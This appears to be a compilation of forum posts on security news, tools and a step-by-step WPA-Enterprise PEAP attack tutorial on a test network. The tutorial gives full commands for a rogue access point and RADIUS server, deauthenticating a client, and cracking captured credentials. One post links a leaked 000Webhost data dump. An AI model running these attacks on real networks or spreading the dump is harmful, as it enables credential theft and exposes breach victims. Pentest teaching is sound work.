ReFUD.me, which emerged in February 2015, allowed cybercriminals to upload their malware samples to see if they would be detected by the products of various antivirus companies. ReFUD.me was similar to VirusTotal, but unlike the Google-owned scanning service, it did not share scanned files with antivirus vendors. Before it was shut down, the reFUD.me website claimed that more than 1.2 million scans had been conducted since February 2015. One of the most recent features added to the cybercrime service, dubbed "scanwatch," allowed users to constantly monitor the detection status of the files they uploaded.

Cryptex Reborn, the evolution of a toolkit advertised since as early as October 2011, allowed malware developers to encrypt their files in an effort to make them "Fully UnDetectable" (FUD). Malware authors could use the product after paying a $20 monthly subscription fee or $90 for lifetime usage. The first versions of the tool, called Cryptex, Cryptex Lite and Cryptex Advanced, all surfaced in 2011. Cryptex Reborn, which is said to offer one of the most sophisticated forms of crypting seen in recent years, was first advertised on cybercrime forums in September 2014, said Trend Micro.

"This investigation is the result of Trend Micro's collaboration with the National Crime Agency of the UK (NCA) and other partners to tackle some of the core components that enable cybercriminal business models to exist," said Martin Rösler, senior director of the Forward-Looking Threat Research team for Trend Micro. "Helping to take down operations such as this is part of our ongoing effort to keep the world safe for exchanging digital information, for both our customers and the Internet at large."

The collaboration between Trend Micro and the NCA is the result of a memorandum of understanding signed by the two organizations in July.

Source: http://www.securityweek.com/alleged-malware-service-operators-arrested-uk
  8. He's sick, he has caffeinology. We need to make some espresso donations urgently!
  9. https://veracrypt.codeplex.com/ https://ciphershed.org/ https://truecrypt.ch/
  10. Nytro

    Fun stuff

    Classic:
  11. Small toolkit for easy creation and usage of various Python scripts that work with embedded devices.

• core - contains most of the toolkit's basic functions
• databases - contains databases, like default credentials etc.
• interface - contains the code used for the creation and manipulation of the interface
• modules - contains the structure of modules that can be loaded; every module contains vendor-specific sub-modules where scripts are stored:
  • decryptors
  • exploits
  • harvesters
  • misc
  • scanners
• output - output goes here

This is still heavy work-in-progress.

Link: https://github.com/j91321/rext
  12. Flaws found in LastPass password manager by security researchers

David Bisson, November 17, 2015, 9:30 pm

Two security researchers have discovered a number of bugs, bad practices, and design issues in the popular LastPass password manager. Martin Vigo and Alberto Garcia Illera, both security engineers at Salesforce.com, recently presented their analysis of LastPass at Black Hat Europe 2015.

In a blog post describing their findings, Vigo and Garcia say that after conducting some preliminary research, the duo decided to see if they could attack LastPass's password vault directly and obtain access to LastPass credentials via three different techniques: client-side attacks, LastPass-side attacks, and attacks from the outside.

Regarding the first method of attack, the researchers found a way to exploit session cookies, allowing them to gain access to the encrypted vault key. "We can use the session cookie to query LastPass and obtain the pwdeckey value," the duo explained. "Once we have that, we can derive a key by doing SHA256(pwdeckey). Now we just need to extract the encrypted vault key from the SQLite DB and decrypt it using the key we just derived."

After unearthing some weaknesses in the way LastPass configured its two-factor authentication protocols, Vigo and Garcia eventually found a way to recover a disabled One Time Password (known as a dOTP, and which the researchers describe as a "master password on steroids") that is stored locally on a user's machine. "This is key to understand the advantage of this attack versus stealing the master password which needs the victim to have previously clicked 'Remember Password'," the researchers note. The duo finally used the dOTP to obtain the session cookie and the encrypted vault key, which they decrypted using the dOTP.

Moving on to LastPass-side attacks, Vigo and Garcia found that the vault itself was not encrypted per se but instead presented cleartext metadata with encrypted values. (The URLs/icons were only encoded, whereas credentials were encrypted using a weak method.) They also found that LastPass added a "custom_js" parameter to every Account node: "Javascript code that will be injected and run in every page load in the domain's context. While this is a legitimate feature, it gives LastPass the possibility of stealing all your credentials."

For outside attacks, the researchers do not go into too much detail in the blog post, and instead direct readers to view the slides of their talk.

At first glance, these bugs with LastPass might seem to endorse the actions of those who - against the advice of some - immediately decided to migrate away from LastPass after the company was bought by LogMeIn. But, as Vigo and Garcia note, LastPass may not be the only password manager with vulnerabilities, and its development team have at least responded to the findings in what seems to be a responsible and timely manner:

We found a number of bugs, bad practices and design issues and used them to obtain the vault key and decrypt all passwords in different scenarios. There is no bug-free software and any future research on other password managers would likely have similar results. LastPass has responded and fixed most of the issues in less than 72 hours.

"We want to point out that the security team at LastPass responded very quickly to all our reports and a lot of the issues were fixed in just a couple of days," the pair explain. "It was very easy to communicate and work with them."

Password managers can have their weaknesses, but as pointed out by Bob Covello on Tripwire's The State of Security blog, even faulty password managers are a good choice versus users storing their passwords in local files. LastPass has taken responsibility for its bugs; it stands to reason that many of these issues will therefore not resurface going forward.

Source: https://grahamcluley.com/2015/11/flaws-lastpass-password-manager-security-researchers/
  13. Researcher Demonstrates Simple BitLocker Bypass
By SecurityWeek News on November 18, 2015

BitLocker, the disk encryption solution implemented in the Windows operating system starting with Windows Vista, does not require sophisticated tools or exploits to be bypassed on systems that do not have the latest patches from Microsoft installed, security researcher Ian Haken claims.

With the help of BitLocker, users can lock their entire computer with full-disk encryption, thus ensuring that an attacker cannot access data. BitLocker is available on professional and enterprise versions of Windows and was also designed to protect the pre-boot process from modification using the Trusted Platform Module (TPM), which is also being used to safely store its secret key for the full-disk encryption.

A TPM is a hardware chip designed to perform cryptographic operations and to store secrets, and its use enables BitLocker to decrypt the operating system partition on boot without requiring pre-boot authentication. However, there is the option to require pre-boot authentication, meaning that the user has to supply a PIN or insert a USB key containing a saved secret key.

One of the Security Support Providers (SSPs) in Windows is Kerberos, and Ian Haken, a researcher at security firm Synopsys, discovered a vulnerability that could allow an attacker to bypass the Kerberos authentication and to decrypt drives encrypted with BitLocker. For the exploit to be successful, however, BitLocker on the target system has to be enabled without a PIN or USB key (pre-boot authentication), the machine should be domain-joined, and the attacker needs physical access to it.

To bypass authentication, Haken explained that the attacker needs to set up a Kerberos Key Distribution Center (KDC), needs control of the network communication and needs to direct communication to the attacker-controlled "mock" domain controller. By connecting the machine to the mock domain controller (DC), the attacker can trigger a password reset action, thus gaining access to the encrypted drives.

According to the researcher, in this scenario, the attacker does not know the user password and the machine password, although it controls both the Windows login screen and the mock DC account database where they will be setting a new user password. To be successful, the attacker needs to trigger the password change Kerberos protocol by setting the mock DC to inform the workstation that the user password has expired. According to Haken, the DC does not have to provide authentication and the workstation prompts the user for a new password, thus allowing the attacker to initiate the exchange. Since the new password is not present on the DC, the login attempt will fail, but the attacker gains access to the machine by disabling network communication, which results in the workstation reverting to local account credentials, now known to the attacker.

"This attack is 100% reliable on affected systems, is not sophisticated (no custom tool was developed, no patches to Samba were necessary, and it was executed with just a few shell commands), and can be executed in a matter of seconds. Configuring Samba manually, this can be done in under a minute. If a tool was written to respond automatically based on DNS/Kerberos requests (thus automatically determining the domain/realm and the username), this could be used to bypass the login screen in a matter of seconds," the researcher explained.

Microsoft resolved the vulnerability in last week's set of patches (Patch Tuesday) by adding an additional authentication check and claims that it was unaware of any attack attempting to exploit this bypass at the time the fix was released. The issue was found to affect all Windows versions from Windows Vista Service Pack 2 onwards, except for Windows RT or Windows RT 8.1, the company explains in a security bulletin.
Sursa: Researcher Demonstrates Simple BitLocker Bypass | SecurityWeek.Com
  14. Thanks. Technically speaking, it doesn't contain anything. In practice, part II doesn't cover "shellcodes" either, but in part III, I hope, many will be able to understand how they are written.
  15. Introduction to Windows shellcode development – Part 1
October 30, 2015, Ionut Popescu

This article contains an overview of shellcode development techniques and their specific aspects. Understanding these concepts allows you to write your own shellcode. Furthermore, you could modify existing exploits that contain already made shellcode to perform custom functionality that you need.

Introduction

Let's say you have a working exploit in Internet Explorer or Flash Player that opens calc.exe. This isn't really useful, is it? What you really want is to execute some remote commands or to do other useful functionality. In this situation you may want to use standard existing shellcode such as the ones from the Shell Storm database or generated by Metasploit's msfvenom tool. However, you must first understand the basic principles of shellcoding so you can use them effectively in your exploits.

Article: http://securitycafe.ro/2015/10/30/introduction-to-windows-shellcode-development-part1/
  16. Domo discounts
Link: Oferta: dam tot 13 noiembrie - DOMO.ro
Info: Domo isi va inchide toate magazinele - surse - IT - HotNews.ro
Edit: Nothing special.
  17. 000Webhost Data Dump https://000webhost.thecthulhu.com/
  18. Ashampoo Burning Studio 2016 (Nero alternative) – FREE license
By Radu FaraVirusi(com) on November 15, 2015

Ashampoo Burning Studio 2016 is an excellent program for burning CD\DVD\Blu-Ray. It is also a good replacement for the classic Nero Burning Room, which has a few disadvantages, among them: it is NOT free and it comes with a lot of useless programs that get installed along with the main program, taking up space and resources. Now you can get this software completely FREE. The program normally costs $50 and offers many functions (the new features in the 2016 version are underlined):
- High DPI aware
- Support for the OPE audio format
- Support for the APE audio format
- Quick access to functions via jump list (Windows 7 and later)
- Permanent archiving via M-DISC technology
- Superior integration into Windows 10 with support for notifications
- creating Data CD\DVD\Blu-Ray
- Backup\Restore function
- creating DVD-Video, Video CD and Super Video CD
- copying CD\DVD\Blu-Ray
- burning and creating .iso, .cue\bin, ashdisc images
- creating Audio and MP3 CDs plus Ripping
- Create and print labels and covers for your discs

Here is how you get the FREE license:
Go to the site below to obtain the registration code: https://www.ashampoo.com/frontend/registration/php/trial_step1.php?session_langid=2&edition_id=lhm40nql56aiecrchpy5oudw1tszrby0&ref=linktarget
Download the product from here: https://cdn2.ashampoo.net/public/ashglob/4610/ashampoo_burning_studio_2016_21653.exe

Via: http://www.faravirusi.com/2015/11/15/ashampoo-burning-studio-2016-alternativa-nero-licenta-gratuita/
  19. Wifi Channel Picker
find the best channel for your Wifi router

Wifi Channel Picker enables you to analyze your Wifi connection and find out which channel will have the least amount of interference from other access points around you. The program can be very useful if your Wifi connection is impacted by interference from other close-by access points, e.g. in an apartment building. When you start Wifi Channel Picker, it will first display a list of all access points that are within reach of your signal. It displays them along with detailed information, including the estimated distance of the access point. You can then select the access point you want to analyze and the program will bring up a short report that suggests the best channel to use for your Wifi access point.

XP/Vista/7/8/10 Portable

Product Details
Publisher: VisionIT
Price: Free
Version: 2.0.2.1
Last updated: Nov 13, 2015
File Size: 104 Kb
Requirements: None

Sursa: Wifi Channel Picker Freeware - Trusted download and reviews from SnapFiles
  20. IT companies in Romania can look for employees on a new recruitment platform dedicated exclusively to the industry
by Raluca Abrihan, 12 November 2015, 16.50

The interactive agency 2Fresh announced the launch of Digitaljob.ro, a niche recruitment platform dedicated exclusively to the digital and IT industry in Romania, following an investment of 30,000 euros. The platform is aimed at companies and specialists working in online, mobile, software and gaming development, as well as advertising or marketing.

At present, companies can post their open positions on Digitaljob.ro for free, and starting with the first quarter of 2016 the platform will charge companies a fee for each job placed. Almost 120 companies have already used the platform's services to find candidates, according to Digitaljob.ro representatives. As for the number of ads published so far, it amounts to 200, generating a total of 900 applicants. At this moment there are over 100 active ads on Digitaljob.ro, and most of them, over 59%, are for programmers, followed by designers with 30% of the total, marketers at 7% and management at approximately 4%. Over the next 6 months, the platform's representatives aim to attract more employers and to increase the number of active jobs by up to 150%.

The idea of launching a niche platform dedicated to this industry came after several failed attempts by the 2Fresh agency to find suitable employees through the existing recruitment methods, on generalist job platforms and with the help of social media, according to Marius Dascalu, Strategy and Creative Director at 2Fresh.

Sursa: Firmele IT din Romania isi pot cauta angajati pe o noua platforma de recrutare dedicata exclusiv industriei - Idei - StartupCafe.ro
  21. Monday, March 3, 2014
Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-Enterprise - Part II
By Tony Lee

Introduction

In our previous articles we used TP-Link's TL-WN722N and a Kali Virtual Machine (VM) to perform wireless discovery and attack against a Wired Equivalent Privacy (WEP) network, a WPA Pre-Shared Key (PSK) network, a network hiding its SSID, a MAC filtering network, and our first round of WPA-Enterprise networks (LEAP and EAP-MD5) to showcase the abilities of this inexpensive and flexible setup.

- WEP: http://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html
- WPA-PSK: SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-PSK
- Hidden SSID: SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - Hidden SSID
- MAC Filtering: http://securitysynapse.blogspot.com/2014/02/wireless-pentesting-on-cheap-kali-MACFiltering.html
- WPA-Enterprise Part I: SecuritySynapse: Wireless Pentesting on the Cheap (Kali + TL-WN722N) - WPA-Enterprise - Part I

In this article we will complete our tests by attacking a test WPA-Enterprise network that uses Protected EAP (PEAP).

Figure 1: Our setup

Consult our previous article (WEP) for the following topics, as they are omitted from this article due to similarity:
- Equipment (Hardware, Software)
- Tips and tricks (Version of Workstation, Screen Resolution, Simple Text Editor)
- Connecting the USB Device

Outline
- Preparation
- WPA-Enterprise Refresher
- Discovery
- Attack
  - PEAP and EAP-TLS Explained
  - Install the Software (freeradius-server-2.1.12, freeradius-wpe patch, hostapd v2.0)
  - Start the RADIUS Server
  - Start the Fake AP
  - Deauthenticate the Client
  - Brute-force the Credentials (MSCHAPv2, EAP-MD5)
  - Connect
- Countermeasures
- Conclusion

Preparation

NetworkManager (included in the default Kali Linux) can cause problems when trying to complete simple tasks such as connecting to wireless networks. To prevent any interference, we will disable it ahead of time.

    root@kali:~# service network-manager stop
    [ ok ] Stopping network connection manager: NetworkManager.

WPA-Enterprise Refresher

We already looked at breaking WEP and WPA-PSK networks in previous articles and mentioned that the danger in using these wireless standards is that there is a shared static key that should be changed every time someone with knowledge of the key leaves the company. After all, you wouldn't want an ex-employee still being able to connect to the network after their departure--would you? This is a security issue in any company that has regular turnover. So what is the alternative? WPA-Enterprise of course!

WPA-Enterprise is ideal for large organizations because it does not use a single shared key which all users use to connect to the wireless network. Each user has their own account (usually username and password) that they use to authenticate to the network. Best of all, these accounts can be centrally authenticated and managed--even linked into existing account repositories such as Active Directory or LDAP. When an employee leaves the company and their account is terminated in Active Directory, it would also be terminated from the wireless if authentication is passed through.

The other unique WPA-Enterprise attribute is its use of Extensible Authentication Protocols (EAPs). This allows multiple implementations and increased flexibility for corporations. This flexibility is a double-edged sword though, as not all EAP types are created equal (in terms of security or ease of deployment). We discussed LEAP and EAP-MD5 in the previous article. The EAP types we will discuss in this article are bolded below (feel free to skip the non-bolded ones, as they are present to be complete):

- LEAP - Lightweight EAP
  Credentials are sent without SSL tunnel protection, using the MS-CHAP authentication protocol.
  "[P]roprietary wireless LAN authentication method developed by Cisco Systems"
  "LEAP uses a modified version of MS-CHAP, an authentication protocol in which user credentials are not strongly protected."
  "Cisco LEAP, similar to WEP, has had well-known security weaknesses since 2003 involving offline password cracking."
  Source: http://en.wikipedia.org/wiki/Lightweight_Extensible_Authentication_Protocol
- EAP-MD5
  Credentials are sent without SSL protection, but MD5 hashed.
  "It offers minimal security; the MD5 hash function is vulnerable to dictionary attacks, and does not support key generation, which makes it unsuitable for use with dynamic WEP, or WPA/WPA2 enterprise."
  Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-MD5
- PEAP - (Protected EAP)
  "[E]ncapsulates the Extensible Authentication Protocol (EAP) within an encrypted and authenticated Transport Layer Security (TLS) tunnel"
  "Jointly developed by Cisco Systems, Microsoft, and RSA Security."
  "Requiring only a server-side PKI certificate to create a secure TLS tunnel to protect user authentication, and uses server-side public key certificates to authenticate the server"
  Source: http://en.wikipedia.org/wiki/Protected_Extensible_Authentication_Protocol
  Most common inner authentication protocols are MSCHAPv2 and GTC (tokens)
- EAP-TLS - (EAP-Transport Layer Security)
  "[U]ses PKI to secure communication to a RADIUS authentication server or another type of authentication server."
  "Though it is rarely deployed, EAP-TLS is still considered one of the most secure EAP standards available and is universally supported by all manufacturers of wireless LAN hardware and software."
  Requires a client-side certificate, which prevents many organizations from using it.
  Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-TLS
- EAP-FAST - (Flexible Authentication via Secure Tunneling)
  "[A] protocol proposal by Cisco Systems as a replacement for LEAP."
  "Use of server certificates is optional in EAP-FAST."
  "EAP-FAST uses a Protected Access Credential (PAC) to establish a TLS tunnel in which client credentials are verified."
  "When automatic PAC provisioning is enabled, EAP-FAST has a slight vulnerability where an attacker can intercept the PAC and use that to compromise user credentials."
  Source: https://en.wikipedia.org/wiki/Extensible_Authentication_Protocol#EAP-FAST

Discovery (kismet)

In previous articles, we used iwlist, airodump-ng, and Kismet to discover wireless networks. This is also the case here. Take a look below at the information that iwlist provides.

    root@kali:~# iwlist wlan1 scanning | grep -A 30 CorpNetwork
    ESSID:"CorpNetwork"
    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s
    Mode:Master
    Extra:tsf=000000000d674180
    Extra: Last beacon: 96ms ago
    IE: Unknown: 000B436F72704E6574776F726B
    IE: Unknown: 010482840B16
    IE: Unknown: 030101
    IE: IEEE 802.11i/WPA2 Version 1
    Group Cipher : TKIP
    Pairwise Ciphers (2) : CCMP TKIP
    Authentication Suites (1) : 802.1x
    --snip--

Even though these three tools can identify WPA-Enterprise networks, none of them can tell you the EAP type. For this we use Wireshark to inspect the packets. Let's capture some traffic with airodump-ng and inspect it with Wireshark, but first we want to place the wireless card into "Monitor" mode.

    root@kali:~# airmon-ng start wlan0

We first use airodump-ng without any options in order to discover the network we want to examine and its details. After we obtain this information, we focus our collection efforts by locking onto the channel and AP.

    Syntax: airodump-ng -c <CHANNEL> --bssid <APMAC> -w <FILE PREFIX> <INT>
    Key:
    -c = Channel that the AP is on
    --bssid = MAC address of the AP
    -w = Prefix of the file name that you want to write data to
    <INT> = Interface we will be capturing on
    Attack: airodump-ng --bssid A0:F3:C1:0C:B6:46 -c 1 -w mysteryEAP mon0

Figure 2: airodump-ng is detecting wireless networks

From this screenshot, we will note a few items for the attack later:

    Variable name = Description: Value
    ==============================
    $ESSID = ESSID: CorpNetwork
    $CH = Channel: 1
    $AP = AP MAC: A0:F3:C1:0C:B6:46
    $VM = Victim user MAC: 24:77:03:8C:D3:44

Now that our capture is running, we can inspect the packets with Wireshark. In order to discover the EAP type, we can use Wireshark's "Statistics -> Protocol Hierarchy" feature. Look for 802.1X Authentication and apply a filter to those selected packets. A shortcut would be to type "eapol" in the display filters.

Figure 3: Wireshark Protocol Hierarchy feature

After applying the filters, we see that the EAP type is Protected EAP (PEAP).

Figure 4: EAP type is PEAP

Attack

Now that discovery is complete and we understand the EAP type, we will examine the attack methodology for PEAP and EAP-TLS.

PEAP and EAP-TLS Explained

Since PEAP and EAP-TLS use a secure tunnel to pass the inner authentication protocol, we will need to create a fake RADIUS server and fake access point and convince the client to connect to our infrastructure. This will be accomplished by having a stronger signal than their access point and then deauthenticating the client so they connect to our AP. The diagrams below help to illustrate the attack process. In the first image, we see normal operation of a client connected to the access point and the access point passing the authentication on to the RADIUS server.

Figure 5: Normal operation in which client is connected to legitimate network

In the second image, we see a deauth attack followed by the client connecting to the fake access point and an attempt to authenticate to the attacker's RADIUS server.

Figure 6: After wireless client is deauthenticated, the client will hopefully connect to our fake access point

This should yield the information necessary to begin a brute force attack of the credentials. Let's look at the detailed steps that are required in getting this setup in our environment. Our steps taken with this setup are outlined below:
- Install the Software
- Start the RADIUS Server
- Start the Fake AP
- Deauthenticate the Client
- Brute-force the Credentials

Install the Software

This attack requires a decent amount of software that is not installed by default on the Kali Linux attack image. The software we need is:
- freeradius-server-2.1.12
- freeradius-wpe (Wireless Pwnage Edition) patch
- hostapd v2.0

We have greatly simplified the download and install of the RADIUS attack service by listing the commands needed below. The freeradius-server-2.1.12 and the patch can be downloaded and applied by copying and pasting the following commands into a terminal as root:

    wget ftp://ftp.freeradius.org/pub/radius/old/freeradius-server-2.1.12.tar.bz2
    wget https://raw.github.com/brad-anton/freeradius-wpe/master/freeradius-wpe.patch
    tar -jxvf freeradius-server-2.1.12.tar.bz2
    cd freeradius-server-2.1.12
    patch -p1 < ../freeradius-wpe.patch
    ./configure
    make
    make install
    ldconfig

Explanation of the commands above: The first two wget statements download both the freeradius server and the patch for wpe. The next line decompresses the freeradius-server package. Then we change directories into the decompressed directory and run the patch. Then we compile and install the application.

After running the commands above, test the freeradius server to make sure the patch was applied by running it with the (-v) version option. You should see "FreeRADIUS-WPE" in the banner.

    root@kali:~/freeradius-server-2.1.12# radiusd -v
    radiusd: FreeRADIUS-WPE Version 2.1.12, for host i686-pc-linux-gnu, built on Jul 29 2013 at 10:34:02
    --snip--

The version of hostapd that Kali has in its repositories is 1.X--which has a limitation of only being able to negotiate WPA1. If we want to be able to attack WPA2 networks, we need to install hostapd v2.0 from source. We have simplified the installation and troubleshooting of the hostapd service by listing the commands below for your copy and paste pleasure:

    wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz
    tar -zxvf hostapd-2.0.tar.gz
    cd hostapd-2.0/
    cd hostapd/
    cp defconfig .config
    apt-get install libnl-dev
    apt-get update
    apt-get install libssl-dev
    make && make install

Explanation of the commands above: The first command obtains the latest source code for hostapd. The next three commands decompress the package and navigate to the proper directory for compilation. We then create a configuration file for compiling. The next three commands grab necessary libraries and finally the last command compiles and installs the binaries.

After all the software is installed, we can start the attack.

Start the RADIUS Server

We can attempt to start the RADIUS server and perform the attack, but there is one configuration change that we needed to make in order to successfully capture credentials from a Windows client using AD pass-through authentication. The file we needed to edit is: /usr/local/etc/raddb/modules/mschap

We had to make sure the line "with_ntdomain_hack" was set to yes and uncommented as shown below:

    # Windows sends us a username in the form of
    # DOMAIN\user, but sends the challenge response
    # based on only the user portion. This hack
    # corrects for that incorrect behavior.
    # with_ntdomain_hack = yes

When that line is commented we received the following error message: "Could not recover last 2 bytes of hash from the challenge/response."

Figure 7: Error message when "with_ntdomain_hack" was not set to yes

Now that we have the configuration file modified, we should be ready to start radiusd.

    Syntax: radiusd -X
    Key:
    -X = Debugging mode. When trying to understand how the server works, ALWAYS run it with "radiusd -X".

The screenshot below shows the expected behavior of running "radiusd -X". The configuration will flash by and then the screen will hang until there is input from the fake access point that we set up in the next step.

Figure 8: radiusd is ready to process requests

Start the Fake AP

If we want to trick the victim into connecting to our setup, we need a fake access point. This can be a hardware based access point, such as the Netgear home router we have been using in the previous articles, or we can create a software access point. Because a software access point is more flexible and portable, we will use the hostapd software AP in this article. The hostapd software requires a configuration file. Feel free to use our example file below to get you started:

    interface=wlan0
    driver=nl80211
    ssid=CorpNetwork
    logger_stdout=-1
    logger_stdout_level=0
    dump_file=/tmp/hostapd.dump
    ieee8021x=1
    eapol_key_index_workaround=0
    own_ip_addr=127.0.0.1
    auth_server_addr=127.0.0.1
    auth_server_port=1812
    auth_server_shared_secret=testing123
    wpa=2
    wpa_key_mgmt=WPA-EAP
    channel=1
    wpa_pairwise=TKIP CCMP

After you have entered the data above in a file called hostapd.conf, run the software and supply the configuration file as shown below:

    Syntax: hostapd <configuration file>
    Syntax: hostapd ./hostapd.conf

After running hostapd, your screen should look like the following screenshot:

Figure 9: hostapd will display minimal output after it is ready to receive the first wireless client

Deauthenticate the Client

Now that we have our RADIUS server and fake access point ready to go, we need a client to authenticate to us. We could be patient and wait for any client to connect or reconnect to our AP, or we could help speed the process up. Our goal here is to deauthenticate (aka kick a client off the network) so they reconnect to the network. Upon client reauthentication, we will trick them into connecting to our fake access point and RADIUS server so they will create the encrypted tunnel with us and pass their inner authentication credentials. In our example, the victim information found during the discovery phase is summarized below:

    Variable name = Description: Value
    ==============================
    $ESSID = ESSID: CorpNetwork
    $CH = Channel: 1
    $AP = AP MAC: A0:F3:C1:0C:B6:46
    $VM = Victim user MAC: 24:77:03:8C:D3:44

Now, let's knock the victim off the wireless network using aireplay's deauthentication attack.

    Syntax: aireplay-ng -0 25 -a <AP> -c <VICTIM_MAC> <INT>
    Key:
    -0 = (same as --deauth) deauthentication attack
    -a = MAC address of the AP
    -c = Victim MAC address
    <INT> = Interface we will be attacking from
    Attack: aireplay-ng -0 25 -a $AP -c $VM mon0

If the client reconnects to your access point, you will see traffic on both the freeradius-wpe screen as well as the hostapd screen. However, the real goods will be displayed in the freeradius-server-wpe.log file:

    root@kali:~# tail -f /usr/local/var/log/radius/freeradius-server-wpe.log

The client authentication will fail, but this still provides us with the MSCHAPv2 challenge/response we need to crack the user's password, shown in the next section.

Figure 10: The user's authentication will fail, but we will have the challenge/response needed to crack the password

Brute-force the Credentials

Since the attack on these WPA-Enterprise inner authentication protocols is an off-line brute-force attack, you will first need a sufficiently large wordlist to supply to the cracking program. The rockyou.com word list is a good start as it is almost 14.5 million passwords. In order to use the rockyou.com wordlist, you will have to uncompress it as shown below:

    root@kali:/usr/share/wordlists# ls
    rockyou.txt.gz
    root@kali:/usr/share/wordlists# gunzip rockyou.txt.gz
    root@kali:/usr/share/wordlists# ls
    rockyou.txt
    root@kali:/usr/share/wordlists# wc -l rockyou.txt
    14344392 rockyou.txt

MSCHAPv2

Since the inner authentication protocol was MSCHAPv2 in this example, we will use Josh Wright's asleap tool as shown below. We will supply the challenge (-C), response (-R), and the wordlist (-W):

    Syntax:
    root@kali:~# asleap
    asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    asleap: Must supply an interface with -i, or a stored file with -r
    Usage: asleap [options]
    -r Read from a libpcap file
    -i Interface to capture on
    -f Dictionary file with NT hashes
    -n Index file for NT hashes
    -s Skip the check to make sure authentication was successful
    -h Output this help information and exit
    -v Print verbose information (more -v for more verbosity)
    -V Print program version and exit
    -C Challenge value in colon-delimited bytes
    -R Response value in colon-delimited bytes
    -W ASCII dictionary file (special purpose)
    Attack:
    root@kali:~# asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W /usr/share/wordlists/rockyou.txt

The asleap tool is very fast. It found our password of "cheekymonkeyrox" in just seconds because it is present as-is within the rockyou password list.

Figure 11: The challenge/response is used in the asleap tool with a dictionary to recover the password

Keep in mind that passwords are case sensitive and would thus most likely require permutations of passwords as discussed in previous articles. For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:

    Generate permutations with JTR:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout
    Feed JTR permutations into asleap:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -W - -C <CHALLENGE> -R <RESPONSE>
    Example:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | asleap -C 9f:55:58:f3:27:72:12:4e -R 79:bc:55:2e:ef:0d:33:1e:ca:5f:75:93:0d:9e:14:e3:6d:78:9b:f5:61:0a:b8:7b -W -

EAP-MD5

If the inner authentication protocol is EAP-MD5, use the eapmd5pass tool:

    Syntax:
    root@kali:~# eapmd5pass
    eapmd5pass - Dictionary attack against EAP-MD5
    Usage: eapmd5pass [ -i <int> | -r <pcapfile> ] [ -w wordfile ] [options]
    -i <iface> interface name
    -r <pcapfile> read from a named libpcap file
    -w <wordfile> use wordfile for possible passwords.
    -b <bssid> BSSID of target network (default: all)
    -U <username> Username of EAP-MD5 user.
    -C <chal> EAP-MD5 challenge value.
    -R <response> EAP-MD5 response value.
    -E <eapid> EAP-MD5 response EAP ID value.
    -v increase verbosity level (max 3)
    -V version information
    -h usage information
    The "-r" and "[-U|-C|-R|-E]" options are not meant to be used together. Use -r when a packet capture is available. Specify the username, challenge and response when available through other means.
    Attack:
    root@kali:~# eapmd5pass -w /usr/share/wordlists/rockyou.txt -r WPAcapture-01.cap

For more complex cracking attempts, it is possible to use John the Ripper (JTR) to perform permutations and make dictionaries larger:

    Generate permutations with JTR:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout
    Feed JTR permutations into eapmd5pass:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r <PCAP>
    Example:
    /usr/sbin/john --rules -w=/usr/share/wordlists/rockyou.txt --stdout | eapmd5pass -w - -r WPAcapture-01.cap

Connect

Now that we have recovered the credentials, we will connect to the AP using the configuration files below:

    Check the status of the card:
    root@kali:~# iwconfig wlan0
    Enter the network information:
    root@kali:~# iwconfig wlan0 essid "QX3A7"
    Bring the Interface up:
    root@kali:~# ifconfig wlan0 up
    Create wpa_supplicant file:
    network={
        ssid="CorpNetwork"
        scan_ssid=1
        key_mgmt=WPA-EAP
        eap=PEAP
        identity="TonyTestUser"
        password="cheekymonkeyrox"
        phase1="peaplabel=0"
        phase2="auth=MSCHAPV2"
    }
    Run the wpa_supplicant:
    root@kali:~# wpa_supplicant -i wlan0 -c ~/wpa-psk.conf
    Obtain an IP:
    root@kali:~# dhclient wlan0
    Reloading /etc/samba/smb.conf: smbd only.
    Verify an IP is obtained:
    root@kali:~# ifconfig wlan0

Countermeasures

Even though the intention of this article is not to warn about the dangers of using WPA-Enterprise PEAP or EAP-TLS security, we feel that it is important to note that client settings can be just as important as the EAP type. That said, we perform many wireless assessments in which we discover misconfigured clients that leave themselves open to the attack outlined in this article. When this is the case, we recommend centrally reconfiguring the wireless clients to reflect a more secure configuration. For example, PEAP properties should always validate server certificates, specify RADIUS servers, specify CAs, and prevent users from overriding any suspicious events. These secure client settings are shown in the screenshot below.

Figure 12: Wireless client settings for PEAP

Conclusion

In this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WPA-Enterprise PEAP test network. For just $16 and no reboot required you can place a wireless adapter into monitor mode and start assessing wireless networks. More testing needs to be done with this setup to determine other capabilities; however, as of right now, it appears that it can provide quick, portable, flexible, and inexpensive wireless testing. Feedback below is always appreciated.

If you try this with different cards and run into issues, check the following excellent resource: http://docs.kali.org/troubleshooting/troubleshooting-wireless-driver-issues

Props
- Thomas d'Otreppe for the ever critical aircrack-ng software suite
- Josh Wright and Brad Antoniewicz for great work on freeradius-WPE
- Josh Wright for asleap and eapmd5pass
- Jouni Malinen <j@w1.fi> and contributors for hostapd
- Offensive security group for Kali Linux
- Dan Dumond for the sanity check and proof read

Posted by Tony Lee at 3:00 AM

Sursa: http://securitysynapse.blogspot.ro/2014/03/wireless-pentesting-on-cheap-kali-WPAEntPartII.html
